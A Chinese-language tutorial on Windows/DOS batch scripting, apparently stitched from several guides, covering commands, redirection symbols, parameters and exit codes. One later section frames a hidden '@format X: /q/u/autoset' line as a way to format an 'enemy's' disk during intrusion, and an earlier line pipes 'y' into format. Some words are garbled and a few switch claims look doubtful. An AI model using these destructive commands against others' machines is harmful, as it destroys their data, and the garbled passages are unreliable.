BTA命令教程

第一部分：批处理的专用命令 

批处理文件是将一系列命令按一定的顺序集合为一个可执行的文本文件，其扩展名为BAT。这些命令统称批处理命令，下面我就来给大家介绍一下批处理的命令。

1、  REM

REM 是个注释命令一般是用来给程序加上注解的，该命令后的内容在程序执行的时候将不会被显示和执行。例：

REM 你现在看到的就是注解，这一句将不会被执行。在以后的例子中解释的内容都REM 会放在REM后面。请大家注意。

2、  ECHO

ECHO 是一个回显命令主要参数有OFF和 ON,一般用ECHO message来显示一个特定的消息 。例：

Echo off

Rem 以上代表关闭回显即不显示所执行的命令

Echo 这个就是消息。

Rem 以上代表显示“这就是消息”这列字符

执行结果：

C:>ECHO.BAT

这个就是消息。

3、  GOTO

GOTO 即为跳转的意思。在批处理中允许以“：XXX”来构建一个标号然后用GOTO ：标号直接来执行标号后的命令。例

:LABEL

REM 上面就是名为LABEL的标号。

DIR C:

DIR D:

GOTO LABEL

REM 以上程序跳转标号LABEL处继续执行。

4、CALL

CALL 命令可以在批处理执行过程中调用另一个批处理，当另一个批处理执行完后再继续执行原来的批处理。例：

批处理2.BAT内容如下：

ECHO 这就是2的内容

批处理1.BAT内容如下：

ECHO 这是1的内容

CALL 2.BAT

ECHO 1和2的内容全部显示完成

执行结果如下：

    C:>1.BAT

    这是1的内容

这就是2的内容

    1和2的内容全部显示完成

5、PAUSE

PAUSE 停止系统命令的执行并显示下面的内容。例：

C:> PAUSE

请按任意键继续 . . .

6、  IF

IF 条件判断语句，语法格式如下：

IF [NOT] ERRORLEVEL number command

IF [NOT] string1==string2 command

IF [NOT] EXIST filename command

说明：

[NOT] 将返回的结果取反值即“如果没有”的意思。

ERRORLEVEL 是命令执行完成后返回的退出值

Number 退出值的数字取值范围0~255。判断时值的排列顺序应该又大到小。返回的值大于或等于指定的值时条件成立。

string1==string2 string1和string2都为字符的数据，英文字符的大小写将看做不同，这个条件中的等于号必须是2个（绝对相等），条件想等后即执行后面的 command

EXIST filename 为文件或目录存在的意思。

IF ERRORLEVEL这条语句必须放在某一个命令后面。执行命令后由IF ERRORLEVEL来判断命令的返回值。

例：

1、  IF [NOT] ERRORLEVEL number command

检测命令执行完后的返回值做出判断。

echo off

dir z:

rem 如果退出代码为1（不成功）就跳至标题1处执行

IF ERRORLEVEL 1 goto 1

rem 如果退出代码为0（成功）就跳至标题0处执行

IF ERRORLEVEL 0 goto 0

:0

echo 命令执行成功！ 

Rem 程序执行完毕跳至标题exit处退出

goto exit

:1

echo 命令执行失败！

Rem 程序执行完毕跳至标题exit处退出

goto exit

:exit

Rem 这里是程序的出口

2、  IF string1==string2 command

检测当前变量的值做出判断

ECHO OFF

IF %1==2 goto no

Echo 变量相等！

Goto exit

:no

echo 变量不相等

goto exit

:exit

大家可以这样看效果 C:>test.bat 数字

3、  IF [NOT] EXIST filename command

发现特定的文件做出判断

echo off

IF not EXIST autoexec.bat goto 1

echo 文件存在成功！ 

goto exit

:1

echo 文件不存在失败！

goto exit

:exit

这个批处理大家可以放在c盘和d盘分别执行看看效果。

7、  FOR

FOR这个命令比较特殊是一个循环执行命令的命令，同时FOR的循环里面还可以套用FOR在进行循环。这篇我们介绍基本的用法就不做套用的循环了，后面再来讲解套用的循环。在批处理中FOR的命令如下：

FOR [%%c] IN (set) DO [command] [arguments]

在命令行中命令如下：

FOR [%c] IN (set) DO [command] [arguments]

常用参数：

/L 该集表示以增量形式从开始到结束的一个数字序列。因此，(1,1,5) 将产生序列 1 2 3 4 5，(5,-1,1) 将产生序列 (5 4 3 2 1)。

/D 如果集中包含通配符，则指定与目录名匹配，而不与文件名匹配。

/F 从指定的文件中读取数据作为变量

eol=c    - 指一个行注释字符的结尾(就一个)

skip=n    - 指在文件开始时忽略的行数。

delims=xxx  - 指分隔符集。这个替换了空格和跳格键的默认分隔符集。

tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代的 for 本身。这会导致额外变量名称的分配。m-n格式为一个范围。通过 nth 符号指定 mth。如果符号字符串中的最后一个字符星号，那么额外的变量将在最后一个符号解析之后分配并接受行的保留文本。

usebackq  - 指定新语法已在下类情况中使用:在作为命令执行一个后引号的字符串并且一个单引号字符为文字字符串命令并允许在 filenameset中使用双引号扩起文件名称。

下面来看一个例子：

FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i %j %k

会分析 myfile.txt 中的每一行，忽略以分号打头的那些行，将每行中的第二个和第三个符号传递给 for 程序体；用逗号和/或空格定界符号。请注意，这个 for 程序体的语句引用 %i 来取得第二个符号，引用 %j 来取得第三个符号，引用 %k来取得第三个符号后的所有剩余符号。对于带有空格的文件名，您需要用双引号将文件名括起来。为了用这种方式来使用双引号，您还需要使用 usebackq 选项，否则，双引号会被理解成是用作定义某个要分析的字符串的。

%i 专门在 for 语句中得到说明，%j 和 %k 是通过tokens= 选项专门得到说明的。您可以通过 tokens= 一行指定最多 26 个符号，只要不试图说明一个高于字母 'z' 或'Z' 的变量。请记住，FOR 变量名分大小写，是通用的；而且，同时不能有 52 个以上都在使用中。

您还可以在相邻字符串上使用 FOR /F 分析逻辑；方法是，用单引号将括号之间的 filenameset 括起来。这样，该字符串会被当作一个文件中的一个单一输入行。最后，您可以用 FOR /F 命令来分析命令的输出。方法是，将括号之间的 filenameset 变成一个反括字符串。该字符串会被当作命令行，传递到一个子 CMD.EXE，其输出会被抓进内存，并被当作文件分析。因此，以下例子:

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

会枚举当前环境中的环境变量名称。

以下列举一个简单的例子，他将说明参数/L和没有参数的区别：

删除文件1.TXT 2.TXT 3.TXT 4.TXT 5.TXT

例：

ECHO OFF

FOR /L %%F IN (1,1,5) DO DEL %%F.TXT

或

FOR %%F IN (1,2,3,4,5) DO DEL %%F.TXT

以上2条命令执行的结果都是一样的如下：

C:>DEL 1.TXT

C:>DEL 2.TXT

C:>DEL 3.TXT

C:>DEL 4.TXT

C:>DEL 5.TXT

8、  SETLOCAL

开始批处理文件中环境改动的本地化操作。在执行 SETLOCAL 之后

所做的环境改动只限于批处理文件。要还原原先的设置，必须执

行 ENDLOCAL。 达到批处理文件结尾时，对于该批处理文件的每个

尚未执行的 SETLOCAL 命令，都会有一个隐含的 ENDLOCAL 被

执行。例：

@ECHO OFF

SET PATH    /*察看环境变量PATH

PAUSE

SETLOCAL

SET PATH=E:TOOLS  /*重新设置环境变量PATH

SET PATH

PAUSE

ENDLOCAL

SET PATH

从上例我们可以看到环境变量PATH第1次被显示得时候是系统默认路径。被设置成了E:TOOLS后显示为E:TOOLS但当ENDLOCAL后我们可以看到他又被还原成了系统的默认路径。但这个设置只在该批处理运行的时候有作用。当批处理运行完成后环境变量PATH将会还原。

9、  SHIFT

SHIFT命令可以让在命令上的的命令使用超过10个（%0~%9）以上的可替代参数例：

ECHO OFF

ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9

SHIFT

ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9

SHIFT

ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9

执行结果如下：

C::>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11

1 2 3 4 5 6 7 8 9

2 3 4 5 6 7 8 9 10

3 4 5 6 7 8 9 10 11

以上就是基于WIN2000下的9个批处理命令。

 

第二部分：特殊的符号与批处理

在命令行下有些符号是不允许使用的但有些符号却有着特殊的意义。

1、  符号(@)

@在批处理中的意思是关闭当前行的回显。我们从上面知道用命令echo off可以关掉整个批处理的命令回显但却不能不显示echo off这个命令。现在我们在这个命令前加上@这样echo off这一命令就被@关闭了回显从而达到所有命令均不回显得要求

2、  符号(>)

>的意思是传递并覆盖。他所起的作用是将运行后的回显结果传递到后面的范围（后面可是文件也可是默认的系统控制台）例：

文件1.txt的文件内容为：

1+1

使用命令c:>dir *.txt >1.txt

这时候1.txt的内容如下

驱动器 C 中的卷没有标签。

卷的序列号是 301A-1508

C: 的目录

2003-03-11 14:04      1,005 FRUNLOG.TXT

2003-04-04 16:38    18,598,494 log.txt

2003-04-04 17:02        5 1.txt

2003-03-12 11:43        0 aierrorlog.txt

2003-03-30 00:35      30,571 202.108.txt

      5 个文件  18,630,070 字节

      0 个目录 1,191,542,784 可用字节 

>将命令执行的结果覆盖了原始的文件内容。

在传递给控制台的时候程序将不会有任何回显（注意：这里的回显跟echo off关掉的回显不是同一概念。Echo off关掉的是输入命令的回显，这里的回显是程序执行中或后的回显）例：

C:>dir *.txt >nul 

程序将没有任何显示也不会产生任何痕迹。

3、  符号(>>)

符号>>的作用与符号>相似，但他们的区别在于>>是传递并在文件末尾追加>>也可将回显传递给控制台（用法同上）例：

文件1.txt内同为：

1+1

使用命令c:>dir *.txt >>1.txt

这时候1.txt的内容如下

1+1

驱动器 C 中的卷没有标签。

卷的序列号是 301A-1508

C: 的目录

2003-03-11 14:04      1,005 FRUNLOG.TXT

2003-04-04 16:38    18,598,494 log.txt

2003-04-04 17:02        5 1.txt

2003-03-12 11:43        0 aierrorlog.txt

2003-03-30 00:35      30,571 202.108.txt

      5 个文件  18,630,070 字节

      0 个目录 1,191,542,784 可用字节 

>>将命令执行的结果覆加在了原始的文件内容后面。

4、  符号(|)

|是一个管道传输命令意思是将上一命令执行的结果传递给下一命令去处理。例：

C:>dir c:|find "1508"

卷的序列号是 301A-1508

以上命令的意思为查找c:的所有并发现1508字符串。Find的用法请用 find /?自行查看

在不使用format的自动格式化参数的时候我是这样来自动格式化盘片的

echo y|fornat a: /s /q /v:system

用过format命令的人都知道format有一个交互对化过程，要使用者输入y来确定当前的命令是否被执行。在这个命令前加上echo y并用管道传输符|将echo执行的结果y传递给format从而达到手工输入y的目的（这条命令有危害性，测试的时候请谨慎）

5、  符号()

 是对特殊符号 > 、echo test > 1.txt

test > 1.txt

从上面可以看出并没有把test写入文件1.txt而是将test >1.txt 当字符串显示了出来。这个符号在远程构建批处理的时候很有效果。 

6、  符号(&)

&符号允许在一行中使用2个以上不同的命令，当第一个命令执行失败将不影响第2个命令的执行。例：

c:> dir z: &dir y: &dir c:

以上的命令将会连续显示z: y: c:盘内的内容不理会该盘符是否存在。

7、  符号(&&)

&&符号也是允许在一行中使用2个以上不同的命令，当第一个命令执行失败后后续的命令将不会再被执行。例：

c:> dir z: &&dir y: &&dir c:

以上的命令将会提示检查是否存在z:盘如果存在则执行，如果不存在则停止执行所有的后续命令

8、  符号(" ")

" "符号允许在字符串中包含空格。进入一个特殊的目录可以用如下方法例:

c:>cd “Program Files”

c:>cd progra~1

c:>cd pro*

以上方法都可以进入Program Files目录

9、  符号（,）

,符号相当于空格。在某些特殊的情况下可以用,来代替空格使用。例：

c:>dir,c:

10、  符号(;)

;符号当命令相同的时候可以将不同的目标用;隔离开来但执行效果不变。如执行过程中发生错误则只返回错误报告但程序还是会继续执行。例：

DIR C:;D:;E:F:

以上的命令相当于

DIR C:

DIR D:

DIR E:

DIR F:

当然还有些特殊的符号但他们的使用范围很小我就不再这里一一的说明了。

 

第三部分：批处理与变量

在批处理中适当的引用变量将会使你所编制的程序应用面更广。批处理每次能处理的变量从%0~%9共10个。其中%0默认给批处理的文件名使用。除非在使用SHIFT命令后%0才能被%1所替代。引用shift命令的例子如果把%1前面多加上一个%0那么结果如下：

C::>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11

SHIFT.BAT 1 2 3 4 5 6 7 8 9

1 2 3 4 5 6 7 8 9 10

2 3 4 5 6 7 8 9 10 11

系统是如何区分每个变量的呢，系统区分变量的规则为字符串中间的空格，即只要发现空格就把空格前面的字符当作一个变量而空格后面的字符则作为另一个变量。如果你的变量是一个当中包含空格的长目录名这时候你需要用上一节特殊符号8中所用的引号将他圈起来。例：

批处理内容为：

ECHO %1 

ECHO %2 

ECHO %3

输入命令：

C:>TEST “Program Files” Program Files

Program Files

Program 

Files

在一个复杂的批处理中又可能同时使用的变量会超过10个这时候会和系统的规则想冲突那么这个问题怎么解决呢？在系统中还有一种变量称之为环境变量（使用SET命令可以查看当前系统的环境变量）如当前系统目录是%windir%或%SystemRoot%等。当同时使用的参数超过10个的时候，我们可以把某些在后面的程序中还要调用的变量保存为环境变量。具体用法如 SET A=%1 这样我们就命名了一个新的环境变量A 在调用变量A的时候要%A%这样调用，环境变量不受SHIFT命令影响。如果要改变一个环境变量需要重新对其设置才能改变。当然也可以进行变量与变量之间的传递来达到目的。下面我们来看一个例子，批处理如下：

ECHO OFF

SET PASS=%1

SHIFT

SET PASS1=%1

SHIFT

ECHO %PASS% %PASS1% %1 %2 %3 %4 %5 %6 %7 %8 %9 

SHIFT

ECHO %PASS% %PASS1% %9

SET PASS=%PASS1%    变量的传递

SET PASS1=%9

SHIFT

ECHO %PASS% %PASS1% %9

使用命令：C:>TEST A B 3 4 5 6 7 8 9 10 K L

A B 3 4 5 6 7 8 9 10 K 注意：这一行显示了11个变量

A B L      在使用了3次SHIFT之后%9变成了L

B L        变量的传递后的结果

 

批处理示例 

 

1. IF-EXIST 

 

1) 首先用记事本在C:\建立一个test1.bat批处理文件，文件内容如下： 

@echo off 

IF EXIST \AUTOEXEC.BAT TYPE \AUTOEXEC.BAT 

IF NOT EXIST \AUTOEXEC.BAT ECHO \AUTOEXEC.BAT does not exist 

 

然后运行它： 

C:\>TEST1.BAT 

 

如果C:\存在AUTOEXEC.BAT文件，那么它的内容就会被显示出来，如果不存在，批处理就会提示你该文件不存在。 

 

2) 接着再建立一个test2.bat文件，内容如下： 

@ECHO OFF 

IF EXIST \%1 TYPE \%1 

IF NOT EXIST \%1 ECHO \%1 does not exist 

 

执行: 

C:\>TEST2 AUTOEXEC.BAT 

该命令运行结果同上。 

 

说明： 

(1) IF EXIST 是用来测试文件是否存在的，格式为 

IF EXIST [路径+文件名] 命令 

(2) test2.bat文件中的%1是参数，DOS允许传递9个批参数信息给批处理文件，分别为%1~%9(%0表示test2命令本身) ，这有点象编程中的实参和形参的关系，%1是形参，AUTOEXEC.BAT是实参。 

 

==== willsort 编注 ===================================================== 

DOS没有 "允许传递9个批参数信息" 的限制, 参数的个数只会受到命令行长度和所调用命令处理能力的限制. 但是, 我们在批处理程序中, 在同一时刻只能同时引用10个参数, 因为 DOS只给出了 %0~%9这十个参数引用符. 

======================================================================== 

 

3) 更进一步的，建立一个名为TEST3.BAT的文件，内容如下： 

@echo off 

IF "%1" == "A" ECHO XIAO 

IF "%2" == "B" ECHO TIAN 

IF "%3" == "C" ECHO XIN 

 

如果运行： 

C:\>TEST3 A B C 

屏幕上会显示: 

XIAO 

TIAN 

XIN 

 

如果运行： 

C:\>TEST3 A B 

屏幕上会显示 

XIAO 

TIAN 

 

在这个命令执行过程中，DOS会将一个空字符串指定给参数%3。 

 

2、IF-ERRORLEVEL 

 

建立TEST4.BAT，内容如下： 

@ECHO OFF 

XCOPY C:\AUTOEXEC.BAT D:\ 

IF ERRORLEVEL 1 ECHO 文件拷贝失败 

IF ERRORLEVEL 0 ECHO 成功拷贝文件 

 

然后执行文件: 

C:\>TEST4 

 

如果文件拷贝成功，屏幕就会显示"成功拷贝文件"，否则就会显示"文件拷贝失败"。 

 

IF ERRORLEVEL 是用来测试它的上一个DOS命令的返回值的，注意只是上一个命令的返回值，而且返回值必须依照从大到小次序顺序判断。 

因此下面的批处理文件是错误的： 

 

@ECHO OFF 

XCOPY C:\AUTOEXEC.BAT D:\ 

IF ERRORLEVEL 0 ECHO 成功拷贝文件 

IF ERRORLEVEL 1 ECHO 未找到拷贝文件 

IF ERRORLEVEL 2 ECHO 用户通过ctrl-c中止拷贝操作 

IF ERRORLEVEL 3 ECHO 预置错误阻止文件拷贝操作 

IF ERRORLEVEL 4 ECHO 拷贝过程中写盘错误 

 

无论拷贝是否成功，后面的： 

 

未找到拷贝文件 

用户通过ctrl-c中止拷贝操作 

预置错误阻止文件拷贝操作 

拷贝过程中写盘错误 

 

都将显示出来。 

 

以下就是几个常用命令的返回值及其代表的意义： 

 

backup 

0 备份成功 

1 未找到备份文件 

2 文件共享冲突阻止备份完成 

3 用户用ctrl-c中止备份 

4 由于致命的错误使备份操作中止 

 

diskcomp 

0 盘比较相同 

1 盘比较不同 

2 用户通过ctrl-c中止比较操作 

3 由于致命的错误使比较操作中止 

4 预置错误中止比较 

 

diskcopy 

0 盘拷贝操作成功 

1 非致命盘读/写错 

2 用户通过ctrl-c结束拷贝操作 

3 因致命的处理错误使盘拷贝中止 

4 预置错误阻止拷贝操作 

 

format 

0 格式化成功 

3 用户通过ctrl-c中止格式化处理 

4 因致命的处理错误使格式化中止 

5 在提示"proceed with format（y/n）?"下用户键入n结束 

 

xcopy 

0 成功拷贝文件 

1 未找到拷贝文件 

2 用户通过ctrl-c中止拷贝操作 

4 预置错误阻止文件拷贝操作 

5 拷贝过程中写盘错误 

 

chkdsk 

0 未找到错误 

255 找到一个或多个错误 

 

choice 

0 用户按下ctrl+c/break 

1 用户按下第一个键 

255 检测到命令行中的错误条件 

其它 用户按下的有效字符在列表中的位置 

 

defrag 

0 碎片压缩成功 

1 出现内部错误 

2 磁盘上没有空簇。要运行DEFRAG，至少要有一个空簇 

3 用户用Ctrl+C退出了DEFRAG 

4 出现一般性错误 

5 DEFRAG在读簇时遇到错误 

6 DEFRAG在写簇时遇到错误 

7 分配空间有错 

8 内存错 

9 没有足够空间来压缩磁盘碎片 

 

deltree 

0 成功地删除一个目录 

 

diskcomp 

0 两盘相同 

1 发现不同 

2 按CTRL+C 终止了比较 

3 出现严重错误 

4 出现初始化错误 

 

find 

0 查找成功且至少找到了一个匹配的字符串 

1 查找成功但没找到匹配的字符串 

2 查找中出现了错误 

 

keyb 

0 键盘定义文件装入成功 

1 使用了非法的键盘代码，字符集或语法 

2 键盘定义文件坏或未找到 

4 键盘、监视器通讯时出错 

5 要求的字符集未准备好 

 

move 

0 成功地移动了指定的文件 

1 发生了错误 

 

msav /N 

86 检查到了病毒 

 

replace 

0 REPLACE成功地替换或加入了文件 

1 MS-DOS版本和REPLACE不兼容 

2 REPLACE找不到源文件 

3 REPLACE找不到源路径或目标路径 

5 不能存取要替换的文件 

8 内存不够无法执行REPLACE 

11 命令行句法错误 

 

restore 

0 RESTORE成功地恢复了文件 

1 RESTORE找不到要恢复的文件 

3 用户按CTRL+C终止恢复过程 

4 RESTORE因错误而终止 

 

scandisk 

0 ScanDisk在它检查的驱动器上未检测到任何错误 

1 由于命令行的语法不对，不能运行ScanDisk 

2 由于内存用尽或发生内部错误，ScanDisk意外终止 

3 用户让ScanDisk中途退出 

4 进行盘面扫描时，用户决定提前退出 

254 ScanDisk找到磁盘故障并已全部校正 

255 ScanDisk找到磁盘故障，但未能全部校正 

 

setver 

0 SETVER成功地完成了任务 

1 用户指定了一个无效的命令开关 

2 用户指定了一个非法的文件名 

3 没有足够的系统内存来运行命令 

4 用户指定了一个非法的版本号格式 

5 SETVER在版本表中未找到指定的项 

6 SETVER未找到SETVER.EXE文件 

7 用户指定了一个非法的驱动器 

8 用户指定了太多的命令行参数 

9 SETVER检测到丢失了命令行参数 

10 在读SETVER.EXE文件时，SETVER检测到发生错误 

11 SETVER.EXE文件损坏 

12 指定的SETVER.EXE文件不支持版本表 

13 版本表中没有足够的空间存放新的项 

14 在写SETVER.EXE文件时SETVER检测到发生错误 

======================================================================== 

 

3、IF STRING1 == STRING2 

 

建立TEST5.BAT，文件内容如下： 

@echo off 

IF "%1" == "A" FORMAT A: 

 

执行： 

C:\>TEST5 A 

屏幕上就出现是否将A:盘格式化的内容。 

 

注意：为了防止参数为空的情况，一般会将字符串用双引号（或者其它符号，注意不能使用保留符号）括起来。 

如：if [%1]==[A] 或者 if %1*==A* 

 

5、GOTO 

 

建立TEST6.BAT，文件内容如下： 

@ECHO OFF 

IF EXIST C:\AUTOEXEC.BAT GOTO _COPY 

GOTO _DONE 

:_COPY 

COPY C:\AUTOEXEC.BAT D:\ 

:_DONE 

 

注意： 

(1) 标号前是ASCII字符的冒号":"，冒号与标号之间不能有空格。 

(2) 标号的命名规则与文件名的命名规则相同。 

(3) DOS支持最长八位字符的标号，当无法区别两个标号时，将跳转至最近的一个标号。 

 

==== willsort 编注 ===================================================== 

1)标号也称作标签(label) 

2)标签不能以大多数的非字母数字字符开始, 而文件名中则可以使用很多 

3)当无法区别两个标签时, 将跳转至位置最靠前的标签 

======================================================================== 

 

6、FOR 

 

建立C:\TEST7.BAT，文件内容如下： 

@ECHO OFF 

FOR %%C IN (*.BAT *.TXT *.SYS) DO TYPE %%C 

 

运行： 

C:\>TEST7 

 

执行以后，屏幕上会将C:盘根目录下所有以BAT、TXT、SYS为扩展名的文件内容显示出来（不包括隐藏文件）。 

 

 

简明批处理教程:

 

批处理命令如果运用得当，威力强大无人能敌!是不是想学习了呢，从今天我将把批处理的常用命令陆续的介绍给大家，如果大家有什么不懂的地方，可以写下评论:

 

批处理文件是无格式的文本文件，它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称，或者双击该批处理文件，系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。 

一.简单批处理内部命令简介 

1.Echo 命令 

打开回显或关闭请求回显功能，或显示消息。如果没有任何参数，echo 命令将显示当前回显设置。 

语法 

echo [{on　off}] [message] 

Sample：@echo off / echo hello world 

在实际应用中我们会把这条命令和重定向符号（也称为管道符号，一般用> >> ）结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。 

 

2.@ 命令 

表示不显示@后面的命令，在入侵过程中（例如使用批处理来格式化敌人的硬盘）自然不能让对方看到你使用的命令啦。 

Sample：@echo off 

@echo Now initializing the program,please wait a minite... 

@format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的，可喜的是微软留了个autoset这个参数给我们，效果和/y是一样的。) 

 

3.Goto 命令 

指定跳转到标签，找到标签后，程序将处理从下一行开始的命令。 

语法：goto label （label是参数，指定所要转向的批处理程序中的行。） 

Sample： 

if {%1}=={} goto noparms 

if {%2}=={} goto noparms（如果这里的if、%1、%2你不明白的话，先跳过去，后面会有详细的解释。） 

@Rem check parameters if null show usage 

:noparms 

echo Usage: monitor.bat ServerIP PortNumber 

goto end 

标签的名字可以随便起，但是最好是有意义的字母啦，字母前加个：用来表示这个字母是标签，goto命令就是根据这个：来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。 

 

4.Rem 命令 

注释命令，在C语言中相当与/*--------*/,它并不会被执行，只是起一个注释的作用，便于别人阅读和你自己最讨厌这话后修改。 

Rem Message 

Sample：@Rem Here is the description. 

5.Pause 命令 

运行 Pause 命令时，将显示下面的消息： 

Press any key to continue . . . 

Sample： 

@echo off 

:begin 

copy a:*.* d：\back 

echo Please put a new disk into driver A 

pause 

goto begin 

在这个例子中，驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入驱动器 A 时，pause 命令会使程序挂起，以便您更换磁盘，然后按任意键继续处理。 

 

6.Call 命令 

从一个批处理程序调用另一个批处理程序，并且不终止父批处理程序。call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用 Call，它将不会在命令行起作用。 

语法 

call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]] 

参数 

[Drive:}[Path] FileName 

指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。 

 

7.start 命令 

调用外部程序，所有的DOS命令和命令行程序都可以由start命令来调用。 

入侵常用参数： 

MIN 开始时窗口最小化 

SEPARATE 在分开的空间内开始 16 位 Windows 程序 

HIGH 在 HIGH 优先级类别开始应用程序 

REALTIME 在 REALTIME 优先级类别开始应用程序 

WAIT 启动应用程序并等候它结束 

parameters 这些为传送到命令/程序的参数 

执行的应用程序是 32-位 GUI 应用程序时，CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行，该新行为则不会发生。 

8.choice 命令 

choice 使用此命令可以让用户输入一个字符，从而运行不同的命令。使用时应该加/c:参数，c:后应写提示可输入的字符，之间无空格。它的返回码为1234…… 

如: choice /c:dme defrag,mem,end 

将显示 

defrag,mem,end[D,M,E]? 

Sample： 

Sample.bat的内容如下: 

@echo off 

choice /c:dme defrag,mem,end 

if errorlevel 3 goto defrag （应先判断数值最高的错误码） 

if errorlevel 2 goto mem 

if errotlevel 1 goto end 

:defrag 

c:\dos\defrag 

goto end 

:mem 

mem 

goto end 

:end 

echo good bye 

此文件运行后，将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ，然后if语句将作出判断，d表示执行标号为defrag的程序段，m表示执行标号为mem的程序段，e表示执行标号为end的程序段，每个程序段最后都以goto end将程序跳到end标号处，然后程序将显示good bye，文件结束。 

 

 

9.If 命令 

if 表示将判断是否符合规定的条件，从而决定执行不同的命令。 有三种格式: 

1、if "参数" == "字符串" 　待执行的命令 

参数如果等于指定的字符串，则条件成立，运行命令，否则运行下一句。(注意是两个等号） 

如if "%1"=="a" format a: 

if {%1}=={} goto noparms 

if {%2}=={} goto noparms 

 

2、if exist 文件名　 待执行的命令 

如果有指定的文件，则条件成立，运行命令，否则运行下一句。 

如if exist config.sys edit config.sys 

 

3、if errorlevel / if not errorlevel 数字　 待执行的命令 

如果返回码等于指定的数字，则条件成立，运行命令，否则运行下一句。 

如if errorlevel 2 goto x2 　 

DOS程序运行时都会返回一个数字给DOS，称为错误码errorlevel或称返回码，常见的返回码为0、1。 

 

10.for 命令 

for 命令是一个比较复杂的命令，主要用于参数在指定的范围内循环执行命令。 

在批处理文件中使用 FOR 命令时，指定变量请使用 %%variable 

for {%variable|%%variable} in (set) do command [ CommandLineOptions] 

%variable 指定一个单一字母可替换的参数。 

(set) 指定一个或一组文件。可以使用通配符。 

command 指定对每个文件执行的命令。 

command-parameters 为特定命令指定参数或命令行开关。 

在批处理文件中使用 FOR 命令时，指定变量请使用 %%variable 

而不要用 %variable。变量名称是区分大小写的，所以 %i 不同于 %I 

如果命令扩展名被启用，下列额外的 FOR 命令格式会受到 

支持: 

FOR /D %variable IN (set) DO command [command-parameters] 

如果集中包含通配符，则指定与目录名匹配，而不与文件 

名匹配。 

FOR /R [[drive:]path] %variable IN (set) DO command [command- 

检查以 [drive:]path 为根的目录树，指向每个目录中的 

FOR 语句。如果在 /R 后没有指定目录，则使用当前 

目录。如果集仅为一个单点(.)字符，则枚举该目录树。 

FOR /L %variable IN (start,step,end) DO command [command-para 

该集表示以增量形式从开始到结束的一个数字序列。 

因此，(1,1,5) 将产生序列 1 2 3 4 5，(5,-1,1) 将产生 

序列 (5 4 3 2 1)。 

FOR /F ["options"] %variable IN (file-set) DO command 

FOR /F ["options"] %variable IN ("string") DO command 

FOR /F ["options"] %variable IN ('command') DO command 

或者，如果有 usebackq 选项: 

FOR /F ["options"] %variable IN (file-set) DO command 

FOR /F ["options"] %variable IN ("string") DO command 

FOR /F ["options"] %variable IN ('command') DO command 

filenameset 为一个或多个文件名。继续到 filenameset 中的 

下一个文件之前，每份文件都已被打开、读取并经过处理。 

处理包括读取文件，将其分成一行行的文字，然后将每行 

解析成零或更多的符号。然后用已找到的符号字符串变量值 

调用 For 循环。以默认方式，/F 通过每个文件的每一行中分开 

的第一个空白符号。跳过空白行。您可通过指定可选 "options" 

参数替代默认解析又讲粗话作。这个带引号的字符串包括一个或多个 

指定不同解析选项的关键字。这些关键字为: 

eol=c - 指一个行注释字符的结尾(就一个) 

skip=n - 指在文件开始时忽略的行数。 

delims=xxx - 指分隔符集。这个替换了空格和跳格键的 

默认分隔符集。 

tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代 

的 for 本身。这会导致额外变量名称的 

格式为一个范围。通过 nth 符号指定 m 

符号字符串中的最后一个字符星号， 

那么额外的变量将在最后一个符号解析之 

分配并接受行的保留文本。 

usebackq - 指定新语法已在下类情况中使用: 

在作为命令执行一个后引号的字符串并且 

引号字符为文字字符串命令并允许在 fi 

中使用双引号扩起文件名称。 

sample1: 

FOR /F "eol=;;; tokens=2,3* delims=, " %i in (myfile.txt) do command 

会分析 myfile.txt 中的每一行，忽略以分号打头的那些行，将 

每行中的第二个和第三个符号传递给 for 程序体；用逗号和/或 

空格定界符号。请注意，这个 for 程序体的语句引用 %i 来 

取得第二个符号，引用 %j 来取得第三个符号，引用 %k 

来取得第三个符号后的所有剩余符号。对于带有空格的文件 

名，您需要用双引号将文件名括起来。为了用这种方式来使 

用双引号，您还需要使用 usebackq 选项，否则，双引号会 

被理解成是用作定义某个要分析的字符串的。 

 

 

%i 专门在 for 语句中得到说明，%j 和 %k 是通过 

tokens= 选项专门得到说明的。您可以通过 tokens= 一行 

指定最多 26 个符号，只要不试图说明一个高于字母 'z' 或 

'Z' 的变量。请记住，FOR 变量是单一字母、分大小写和全局的； 

同时不能有 52 个以上都在使用中。 

 

您还可以在相邻字符串上使用 FOR /F 分析逻辑；方法是， 

用单引号将括号之间的 filenameset 括起来。这样，该字符 

串会被当作一个文件中的一个单一输入行。 

 

最后，您可以用 FOR /F 命令来分析命令的输出。方法是，将 

括号之间的 filenameset 变成一个反括字符串。该字符串会 

被当作命令行，传递到一个子 CMD.EXE，其输出会被抓进 

内存，并被当作文件分析。因此，以下例子: 

 

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 

 

会枚举当前环境中的环境变量名称。 

 

另外，FOR 变量参照的替换已被增强。您现在可以使用下列 

选项语法: 

 

~I - 删除任何引号(")，扩充 %I 

%~fI - 将 %I 扩充到一个完全合格的路径名 

%~dI - 仅将 %I 扩充到一个驱动器号 

%~pI - 仅将 %I 扩充到一个路径 

%~nI - 仅将 %I 扩充到一个文件名 

%~xI - 仅将 %I 扩充到一个文件扩展名 

%~sI - 扩充的路径只含有短名 

%~aI - 将 %I 扩充到文件的文件属性 

%~tI - 将 %I 扩充到文件的最讨厌这话期/时间 

%~zI - 将 %I 扩充到文件的大小 

